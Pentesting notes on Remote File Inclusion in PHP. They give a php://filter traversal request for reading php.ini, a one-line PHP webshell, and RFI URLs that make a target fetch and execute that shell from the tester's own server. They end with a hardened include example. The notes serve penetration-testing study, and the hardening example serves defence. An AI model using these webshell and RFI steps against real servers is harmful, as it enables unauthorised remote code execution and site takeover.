Sfoffo - Pentesting Notes
Remote File Inclusion (RFI)

Introduction

  • RFI is an LFI that additionally allows remote URLs to be included, so that a file hosted on another server is fetched and executed by the vulnerable application

  • Its two main uses are enumerating local ports and internal web applications (the RFI behaves like an SSRF) and gaining RCE by **including a malicious script that we host on our own server**

  • Almost any RFI vulnerability is also an LFI vulnerability (by including a local file path instead of a remote URL)


Enumerate RFI Vulnerabilities

  1. Check whether allow_url_include is enabled:

    • To do so, read the PHP configuration file, found at:

    • /etc/php/X.Y/apache2/php.ini for Apache

    • /etc/php/X.Y/fpm/php.ini for Nginx (PHP-FPM)

    • where X.Y is the installed PHP version

  2. Read the PHP Configuration File using the base64 filter (to ensure everything is read properly)

    • curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

  3. Check if the option is set to ON: echo 'BASE64VALUE' | base64 -d | grep allow_url_include

  4. This check is not conclusive: even when the setting is enabled, the vulnerable function may not support remote URL inclusion at all, and a disabled setting does not rule out other ways of including local files.

  5. Try to include a URL, starting with a local URL such as http://127.0.0.1:80/index.php; if that works, include a remote URL.


Remote Code Execution from RFI

Follow these steps:

  1. Write the webshell payload file: echo '<?php system($_GET["cmd"]); ?>' > shell.php

  2. Start a webserver: sudo python3 -m http.server <LISTENING_PORT>

  3. Use RFI to gain RCE: http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

  4. The same can be done by serving the file from a local FTP or SMB server and including ftp://<OUR_IP>/shell.php&cmd=id or \\<OUR_IP>\share\shell.php
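As an added example that is not part of these notes, the include pattern behind an index.php?language= endpoint like the one used in both sections above, first in the vulnerable form the steps rely on and then hardened with an allowlist so neither php://filter reads nor remote inclusion are possible; the languages/ directory and the file names are assumptions.

```php
<?php
// Added example (not from the original notes): the include() pattern behind an
// index.php?language=... endpoint, in vulnerable and hardened form.

// VULNERABLE: the user-controlled value reaches include() unchanged. With
// allow_url_include=On this accepts http://, ftp:// and php://filter streams
// (the RFI case); with it Off it is still an LFI for local paths.
function render_language_vulnerable(string $language): void
{
    include($language);
}

// HARDENED: map the request parameter to a fixed set of known files and refuse
// everything else. No user-supplied bytes ever form the include path, so stream
// wrappers, traversal sequences and remote hosts cannot reach include().
const LANGUAGE_FILES = [
    'en' => __DIR__ . '/languages/en.php',   // assumed file layout
    'es' => __DIR__ . '/languages/es.php',
];

// Returns the allowlisted path for a known key, or null for anything else
// (missing parameter, unknown key, or a non-string such as language[]=x).
function resolve_language(mixed $language): ?string
{
    if (!is_string($language) || !array_key_exists($language, LANGUAGE_FILES)) {
        return null;
    }
    return LANGUAGE_FILES[$language];
}

function render_language_hardened(mixed $language): void
{
    // Unknown keys fall back to the default file instead of echoing the input
    // back in an error message.
    $file = resolve_language($language) ?? LANGUAGE_FILES['en'];
    include $file;
}

// Defence in depth (php.ini, independent of the code fix): allow_url_include=Off
// blocks remote inclusion even if another include() is later left unguarded;
// allow_url_fopen=Off additionally stops fopen()/file_get_contents() URL fetches.
render_language_hardened($_GET['language'] ?? null);
```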

Last updated 1 year ago
